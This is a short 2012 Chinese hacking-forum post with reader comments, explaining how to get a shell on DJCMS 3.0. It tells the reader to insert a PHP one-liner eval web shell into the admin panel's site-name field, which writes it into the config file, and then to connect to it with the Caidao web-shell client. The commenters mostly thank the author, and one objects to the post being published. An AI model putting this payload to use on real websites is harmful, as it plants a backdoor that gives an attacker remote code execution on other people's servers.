DJCMS 3.0后台拿shell

2012-09-13 14:51:11 11 1943 3181

进入后台在其它设置里网站名称插入以下一句话

记住提交两次

");eval($_POST[cmd])?>

然后用菜刀连接

http://www.u.com/inc/config.php

by:xch40

类别 Web安全

关于作者

194323篇文章327篇回复

评论11次

要评论？请先登录或注册

11楼

善良的拖鞋
2012-10-26 11:44

观摩一下

回复|@ta|踩(0)|顶(0)
10楼

p34ch
2012-10-26 10:21

本地测试后，后台程序就乱码了。。继续看看哪里的过滤问题。

回复|@ta|踩(0)|顶(0)
9楼

低调
2012-10-19 11:29

mark！！

回复|@ta|踩(0)|顶(0)
8楼

星天
2012-10-17 15:46

好吧我表示我的两个站都是djcms

回复|@ta|踩(0)|顶(0)
7楼

xiaobai
2012-9-14 21:12

收下了

回复|@ta|踩(0)|顶(0)
6楼

0gussi
2012-9-14 13:20

- -这样的东西就不要发了吧.....直接写入变异一句话到配置文件-_,

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2012-9-13 21:15

收下、、、、、

回复|@ta|踩(0)|顶(0)
4楼

xiehou
2012-9-13 19:54

这算是提交参数的时候没有进行过滤的漏洞吗？

回复|@ta|踩(0)|顶(0)
3楼

ty4z2008
2012-9-13 19:00

和DZ很类似

回复|@ta|踩(0)|顶(0)
2楼

妖妖灵
2012-9-13 18:36

强烈支持原创

回复|@ta|踩(0)|顶(0)
1楼

istice
2012-9-13 17:40

1943 神秘小强本人？

回复|@ta|踩(0)|顶(0)

热门文章

安全资讯基于 Linux 的联想网络摄像头漏洞可被远程利用，引发 BadUSB 攻击

网络安全研究人员披露了联想部分型号网络摄像头的漏洞，这些漏洞 ...

2025-08-10 10:39:35 7 1134

代码学习用aspx打包tar.gz

有时候环境中无法执行命令，但又需要打包文件，可以用这个脚本as ...

2025-08-27 15:51:19 12 870

安全资讯【T00ls十七载同行】我的十年网安梦

作为信安专业科班选手，从最开始做技术，到后来网安头部企业安全 ...

2025-08-22 16:09:25 6 996

安全资讯勒索软件谈判专家被发现与黑客合伙并从赎金中获得抽成目前已被刑事调查

美国司法部日前对某位前勒索软件谈判专家进行刑事调查，原因是这 ...

2025-07-04 21:46:12 9 2378

安全资讯大型语言模型 (LLM) 正陷入网络钓鱼诈骗：当 AI 给你错误的 URL 时会发生什么？😜😜😜😱

图片引用自:netcraftIain-Thomson：犯罪分子已经掌握了一种误导 ...

2025-07-05 04:08:29 6 2065

精华推荐

渗透测试Spring Boot 相关漏洞利用 Check List

> Spring Boot 相关漏洞学习资料，利用方法和技巧合集，黑盒安全 ...

2020-06-06 16:16:41 72 30412

逆向破解yara CS与Agent

### 前言之前做的SLEEP HOOK马没做反沙箱被发微步了，直接标记 ...

2024-08-15 10:01:53 16 760

渗透测试在docker容器中运行或一键运行GourdScanV2 (windows版)

看到论坛@v0new 会员发了篇在docker容器中运行kali linux （wind ...

2016-10-27 12:01:07 41 24643

渗透测试我是如何从零开始制作一台呼死你设备的

表弟才疏学浅，文章是以一个新手的视角来写的。如文章有错误的地 ...

2017-03-28 21:16:41 32 994

渗透测试深入理解JPEG图像格式Jphide隐写

## 0x00 隐写原理 ##Jphide是基于最低有效位LSB的JPEG格式图像隐 ...

2016-05-14 22:54:20 30 13205

Top ↑